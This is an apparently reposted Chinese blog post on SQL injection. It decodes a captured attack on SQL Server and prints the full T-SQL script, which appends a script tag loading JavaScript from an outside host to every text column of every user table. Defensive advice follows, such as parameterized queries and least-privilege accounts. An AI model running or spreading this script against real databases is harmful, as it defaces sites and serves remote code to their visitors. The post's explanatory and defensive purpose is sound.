再谈sql注入(sql inject)
来源:互联网 发布:中企动力域名证书 编辑:程序博客网 时间:2024/05/22 07:40
这是注入尝试的请求,用来确认是否为sql server
(sElEcT ChAr(94)%2B cAsT(CoUnT(1) aS VaRcHaR(100))%2bChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0
转化掉urlencode如下
(sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0
转化掉urlencode,并把这些二进制的code转化为字符串,就是如下脚本了!
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR
FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script type="text/javascript" src="http://www.gzqjfs.com/jscript/googleCode.js"></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
记住不要乱try哦!最好在自己本地数据库去玩!
建议:
1.不要让人家看到你的错误信息,也就不可能知道你是什么数据库,也就不可能通过系统表来操作了。
2.看看这个东西多长了,记住,参数判断下长度(建设好哦啊不必要的注入)。当然有些字段本生就很长,那就记得下面的建议
3.一点主要过滤关键字,如exec,execute,如select,declare,把这些统一处理掉,注意看人家为啥要写成dEcLaRe,而非delcalre or DECLARE
4.少用字符串拼接sql语句,记得用传参数的方式。尽量多的用存储过程
5.对不同的程序给予不同的sql server用户权限。前台(只读),后台,不同库用户权限分下,这样注入不会是整个服务器!
对已有程序建议如下处理:
处理所有请求,即对所有请求的QueryString和Form参数进行过滤
具体如何操作,可以联系本人!(只是写了个邮件贴出来了,具体操作,有空再写吧!)
- 再谈sql注入(sql inject)
- SQL注入(手工注入)
- SQL注入(SQL Injection)
- 再谈sql注入
- sql注入(2)
- SQL注入(一)
- SQL注入(二)
- SQL注入(转载)
- SQL注入(PreparedStatement)
- Sql注入(转)
- sql注入(笔记)
- Google Guice 注入(@Inject注解)
- Google Guice(@Inject)静态注入
- angulrJS依赖注入(三)-$inject
- Google Guice 注入(@Inject注解)
- Google Guice 注入(@Inject注解)
- SQL注入
- SQL注入
- eclipse&php开发环境配置
- 写了个监控网络流量的脚本
- 短信接入DSMP的业务分类说明
- [最佳实践]在Scrum敏捷软件开发模式中,我们是如何开Sprint 计划会议的
- 我的卓越亚马逊和当当购书经历
- 再谈sql注入(sql inject)
- MSN远程协助
- 09年中国软件企业最应该投资的5大技术
- 一段完整的Socket HTTP协议中 GET报文的应用
- SMPP是一种通用的短信接口协议
- 学习信号处理的一个例子
- C# 基类中读取Session
- extjs grid数据改变后刷新的实现
- 转《DLL木马进程内幕大揭秘》
